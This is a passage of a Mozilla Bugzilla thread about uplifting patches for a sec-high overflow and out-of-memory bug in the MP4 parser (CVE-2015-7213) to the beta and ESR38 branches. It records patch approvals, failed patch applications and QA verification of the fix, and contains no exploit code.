Comment on attachment 8694544 [details] [diff] [review] Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch [Approval Request Comment] If this is not a sec:{high,crit} bug, please state case for ESR consideration: It is sec-high. User impact if declined: Potential OOMs, crashes with bad MP4 files. Fix Landed on Version: 44 Risk to taking this patch (and alternatives if risky): Very little, it's only added checks with parsing bailouts. String or UUID changes made by this patch: None.
Attachment #8694544 -
Flags: approval-mozilla-esr38?
Comment on attachment 8694545 [details] [diff] [review] Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch [Approval Request Comment] If this is not a sec:{high,crit} bug, please state case for ESR consideration: It is sec-high. User impact if declined: Potential OOMs, crashes with bad MP4 files. Fix Landed on Version: 44 Risk to taking this patch (and alternatives if risky): Very little, it's only added checks with parsing bailouts. String or UUID changes made by this patch: None.
Flags: needinfo?(gsquelart)
Attachment #8694545 -
Flags: approval-mozilla-esr38?
Comment 32•9 years ago
|
||
Gerald does this need uplift to beta as well? Which patches? Thanks.
Flags: needinfo?(gsquelart)
Comment 33•9 years ago
|
||
Comment on attachment 8694544 [details] [diff] [review] Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch Please uplift to beta, avoids crash from corrupt mp3 files.
Attachment #8694544 -
Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
Comment 34•9 years ago
|
||
Comment on attachment 8694545 [details] [diff] [review] Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch This should also uplift to beta to avoid OOM crashes from mpeg4.
Attachment #8694545 -
Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
Comment 35•9 years ago
|
||
Marking this as affected for 43 and accepting beta uplifts since I talked with Gerald on irc.
status-firefox43:
--- → affected
tracking-firefox43:
--- → +
tracking-firefox44:
--- → +
Flags: needinfo?(gsquelart)
Comment 36•9 years ago
|
||
Comment on attachment 8694545 [details] [diff] [review] Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch Re-setting esr flag for sylvestre to handle, as I meant to set the approval for beta!
Attachment #8694545 -
Flags: approval-mozilla-esr38?
Attachment #8694545 -
Flags: approval-mozilla-esr38+
Attachment #8694545 -
Flags: approval-mozilla-beta+
Comment 37•9 years ago
|
||
Comment on attachment 8694544 [details] [diff] [review] Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch Fixing this to be an approval for beta, not esr.
Attachment #8694544 -
Flags: approval-mozilla-esr38?
Attachment #8694544 -
Flags: approval-mozilla-esr38+
Attachment #8694544 -
Flags: approval-mozilla-beta+
Comment 38•9 years ago
|
||
this failed to apply to beta and aurora with: adding 1206211-P1-beta.patch to series file applying 1206211-P1-beta.patch patching file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp Hunk #1 FAILED at 502 1 out of 1 hunks FAILED -- saving rejects to file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp.rej patch failed, unable to continue (try -v) patch failed, rejects left in working directory could you take a look ? Thanks!
Flags: needinfo?(jyavenard)
Working on it and bug 1216748.
Flags: needinfo?(jyavenard)
Attachment #8694544 -
Flags: approval-mozilla-beta+
Attachment #8694545 -
Flags: approval-mozilla-beta+
Comment on attachment 8665247 [details] [diff] [review] P1. Ensure operation can't overflow. (Requesting beta on the correct patches)
Attachment #8665247 -
Flags: approval-mozilla-beta?
Comment on attachment 8665248 [details] [diff] [review] P2. Abort on OOM. (Requesting beta on the correct patches)
Attachment #8665248 -
Flags: approval-mozilla-beta?
Comment 42•9 years ago
|
||
Comment on attachment 8665247 [details] [diff] [review] P1. Ensure operation can't overflow. Please uplift this patch to beta. My mistake!
Attachment #8665247 -
Flags: approval-mozilla-beta? → approval-mozilla-beta+
Comment 43•9 years ago
|
||
Comment on attachment 8665248 [details] [diff] [review] P2. Abort on OOM. This should uplift to beta, I had the wrong patch in the last request.
Attachment #8665248 -
Flags: approval-mozilla-beta? → approval-mozilla-beta+
(In reply to Carsten Book [:Tomcat] from comment #38) > this failed to apply to beta and aurora [...] Beta should now work, with the correct patches. But please don't try and uplift them to aurora, as they're already there.
https://hg.mozilla.org/releases/mozilla-beta/rev/3a00ac7ecacb https://hg.mozilla.org/releases/mozilla-beta/rev/c288fafdfb4f
Comment 46•9 years ago
|
||
Another ESR38 affected sec-high that hasn't been approved and checked in...
Flags: needinfo?(sledru)
Flags: needinfo?(lhenry)
Updated•9 years ago
|
Whiteboard: [adv-main43+]
Comment 47•9 years ago
|
||
Comment on attachment 8694545 [details] [diff] [review] Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch taking it too in esr.
Flags: needinfo?(sledru)
Flags: needinfo?(lhenry)
Attachment #8694545 -
Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
Comment 48•9 years ago
|
||
failed to apply to esr: patching file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp Hunk #1 FAILED at 511 1 out of 1 hunks FAILED -- saving rejects to file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp.rej patch failed, unable to continue (try -v) patch failed, rejects left in working directory errors during apply, please fix and qrefresh 1206211.patch
Flags: needinfo?(jyavenard)
Sylvestre, you left Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch as "esr38?", could you please approve it? (Or is it implied by the approval of the 2nd patch?) Carsten, to be sure: Did you try and commit both *-ESR38.patch files? I've tried locally and they just worked.
Flags: needinfo?(jyavenard) → needinfo?(sledru)
(In reply to Gerald Squelart [:gerald] from comment #49) > Carsten, to be sure: Did you try and commit both *-ESR38.patch files? I've > tried locally and they just worked. Also, once these patches land, please check-in bug 1216748 patches (all those with esr38+). Thank you! Please contact me if you're still having troubles.
Flags: needinfo?(cbook)
Comment 51•9 years ago
|
||
Comment on attachment 8694544 [details] [diff] [review] Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch This was a typo, sorry
Flags: needinfo?(sledru)
Attachment #8694544 -
Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
Updated•9 years ago
|
Keywords: checkin-needed
Comment 52•9 years ago
|
||
(In reply to Gerald Squelart [:gerald] from comment #50) > (In reply to Gerald Squelart [:gerald] from comment #49) > > Carsten, to be sure: Did you try and commit both *-ESR38.patch files? I've > > tried locally and they just worked. > > Also, once these patches land, please check-in bug 1216748 patches (all > those with esr38+). Thank you! > Please contact me if you're still having troubles. oh sorry missed that 2nd patch when i tried first but now with the 2nd patch and approval :) all is good and landed as https://hg.mozilla.org/releases/mozilla-esr38/rev/f710e2e351b9 https://hg.mozilla.org/releases/mozilla-esr38/rev/75343b2f90f4
Flags: needinfo?(cbook)
Updated•9 years ago
|
Keywords: checkin-needed
Updated•9 years ago
|
Alias: CVE-2015-7213
Whiteboard: [adv-main43+] → [adv-main43+][adv-esr38.5+]
Comment 53•9 years ago
|
||
Reproduced this issue on Windows 10 x64 with Firefox 40 beta 8, using the attached poc. Confirming the fix for: *44 beta 9, build ID: 20160114165817 *43.0.3, build ID: 20151223140742 *latest 38.5.2esr tinderbox, build ID: 20160114062730
Status: RESOLVED → VERIFIED
QA Contact: cornel.ionce
Updated•8 years ago
|
Group: core-security-release
Updated•4 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•